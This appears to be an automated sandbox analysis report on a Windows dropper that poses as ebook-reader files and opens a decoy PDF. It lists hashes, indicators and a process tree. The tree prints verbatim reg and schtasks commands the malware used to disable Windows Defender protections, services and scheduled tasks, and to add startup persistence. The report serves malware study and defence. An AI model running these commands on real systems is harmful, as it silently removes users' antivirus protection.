Analysis
- max time kernel: 150s
- max time network: 142s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 17-11-2020 14:09

Static task: static1

Behavioral task: behavioral1
- Sample: b4f13d994a6ecd0853ffae7794afdb36.exe
- Resource: win7v20201028

Behavioral task: behavioral2
- Sample: b4f13d994a6ecd0853ffae7794afdb36.exe
- Resource: win10v20201028

General
- Target: b4f13d994a6ecd0853ffae7794afdb36.exe
- Size: 15.0MB
- MD5: d8b28c55bf7cc4a07a1766b33109e82b
- SHA1: 03ba66c56ca18bcecd078aeb9558825062157403
- SHA256: 13540d62324d40e8b15db72f32fdf1eb407f4f4d9c4cac05d5f436c39a000df2
- SHA512: 2654e24a3d2a23b8f004d32cc809fc4826fba7d59eb13889f2cc0e1f5df967fa91bf38873f1d555da62e427dde47adfd8231e91d62a0a55195858fc01fab22b6
Malware Config
Signatures
Executes dropped EXE 3 IoCs
Processes (pid, process):
- 2812 EbookReaderMui.exe
- 3740 EbookRplg.exe
- 4000 EbookNplg.exe
Drops startup file 4 IoCs
Processes (description, ioc, process):
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InstallMui.exe (EbookNplg.exe)
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InstallMui.exe (EbookNplg.exe)
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\installui.exe (EbookRplg.exe)
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\installui.exe (EbookRplg.exe)
Modifies service 2 TTPs 5 IoCs
Processes (description, ioc, process):
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc (reg.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend (reg.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot (reg.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter (reg.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv (reg.exe)
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes (description, ioc, process):
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (AcroRd32.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (AcroRd32.exe)
Modifies Internet Explorer settings
Processes (description, ioc, process):
- Key created: \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION (AcroRd32.exe)
Modifies registry class 1 IoCs
Processes (description, ioc, process):
- Key created: \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings (b4f13d994a6ecd0853ffae7794afdb36.exe)
Suspicious behavior: EnumeratesProcesses 38 IoCs
Processes (pid, process; verbatim repeats collapsed):
- 4000 EbookNplg.exe
- 3740 EbookRplg.exe
- 200 AcroRd32.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes (description, pid, process):
- Token: SeDebugPrivilege, 4000 EbookNplg.exe
- Token: SeDebugPrivilege, 3740 EbookRplg.exe
Suspicious use of FindShellTrayWindow 1 IoCs
Processes (pid, process):
- 200 AcroRd32.exe
Suspicious use of SetWindowsHookEx 6 IoCs
Processes (pid, process; verbatim repeats collapsed):
- 2812 EbookReaderMui.exe
- 200 AcroRd32.exe
Suspicious use of WriteProcessMemory 327 IoCs
Processes (source pid and process -> target pid and process; verbatim repeats collapsed):
- 4040 b4f13d994a6ecd0853ffae7794afdb36.exe -> 2812 EbookReaderMui.exe
- 4040 b4f13d994a6ecd0853ffae7794afdb36.exe -> 3740 EbookRplg.exe
- 4040 b4f13d994a6ecd0853ffae7794afdb36.exe -> 4000 EbookNplg.exe
- 4040 b4f13d994a6ecd0853ffae7794afdb36.exe -> 200 AcroRd32.exe
- 2812 EbookReaderMui.exe -> 2004 cmd.exe
- 2004 cmd.exe -> 1512 reg.exe
- 2004 cmd.exe -> 3624 reg.exe
- 2004 cmd.exe -> 1180 reg.exe
- 2004 cmd.exe -> 3936 reg.exe
- 2004 cmd.exe -> 2512 reg.exe
- 2004 cmd.exe -> 2924 reg.exe
- 2004 cmd.exe -> 3996 reg.exe
- 2004 cmd.exe -> 4056 reg.exe
- 2004 cmd.exe -> 1352 reg.exe
- 2004 cmd.exe -> 2808 reg.exe
- 2004 cmd.exe -> 732 reg.exe
- 2004 cmd.exe -> 1340 reg.exe
- 2004 cmd.exe -> 2652 reg.exe
- 2004 cmd.exe -> 3912 reg.exe
- 2004 cmd.exe -> 2456 reg.exe
- 2004 cmd.exe -> 2924 schtasks.exe
- 2004 cmd.exe -> 4056 schtasks.exe
- 2004 cmd.exe -> 3376 schtasks.exe
- 2004 cmd.exe -> 1380 schtasks.exe
- 2004 cmd.exe -> 3892 schtasks.exe
- 2004 cmd.exe -> 2508 reg.exe
- 2004 cmd.exe -> 4056 reg.exe
- 2004 cmd.exe -> 1368 reg.exe
- 2004 cmd.exe -> 3976 reg.exe
- 2004 cmd.exe -> 1512 reg.exe
Processes (indentation shows the parent/child nesting of the process tree)
- C:\Users\Admin\AppData\Local\Temp\b4f13d994a6ecd0853ffae7794afdb36.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\b4f13d994a6ecd0853ffae7794afdb36.exe"
  Signatures: Modifies registry class; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe
    Command line: "C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe"
    Signatures: Executes dropped EXE; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3C63.tmp\3C64.tmp\3C65.bat C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      - C:\Windows\system32\schtasks.exe
        Command line: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      - C:\Windows\system32\schtasks.exe
        Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      - C:\Windows\system32\schtasks.exe
        Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      - C:\Windows\system32\schtasks.exe
        Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      - C:\Windows\system32\schtasks.exe
        Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      - C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      - C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      - C:\Windows\system32\reg.exe
        Command line: reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      - C:\Windows\system32\reg.exe
        Command line: reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      - C:\Windows\system32\reg.exe
        Command line: reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        Signatures: Modifies service
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        Signatures: Modifies service
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        Signatures: Modifies service
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        Signatures: Modifies service
      - C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        Signatures: Modifies service
  - C:\Users\Admin\AppData\Roaming\EbookRplg.exe
    Command line: "C:\Users\Admin\AppData\Roaming\EbookRplg.exe"
    Signatures: Executes dropped EXE; Drops startup file; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Roaming\EbookNplg.exe
    Command line: "C:\Users\Admin\AppData\Roaming\EbookNplg.exe"
    Signatures: Executes dropped EXE; Drops startup file; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Games-Aktuell-05-2020.pdf"
    Signatures: Checks processor information in registry; Modifies Internet Explorer settings; Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow; Suspicious use of SetWindowsHookEx
    - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=79BA6ADFFBB39D4D6873DC1F516B233E --mojo-platform-channel-handle=1636 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=60DDD6F7A6010F68307DC73066E0102A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=60DDD6F7A6010F68307DC73066E0102A --renderer-client-id=2 --mojo-platform-channel-handle=1648 --allow-no-sandbox-job /prefetch:1
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=0D646FE9FCA8661FD3ABD688504FC120 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=0D646FE9FCA8661FD3ABD688504FC120 --renderer-client-id=4 --mojo-platform-channel-handle=2068 --allow-no-sandbox-job /prefetch:1
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2ECA88EDC3E943D70E59A160836B8248 --mojo-platform-channel-handle=2448 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=76E143AC8485DC7DF4AC8F7AC5150725 --mojo-platform-channel-handle=2608 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F06ADB2F2B00EEF405D67FF5B9B83E13 --mojo-platform-channel-handle=1924 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
Downloads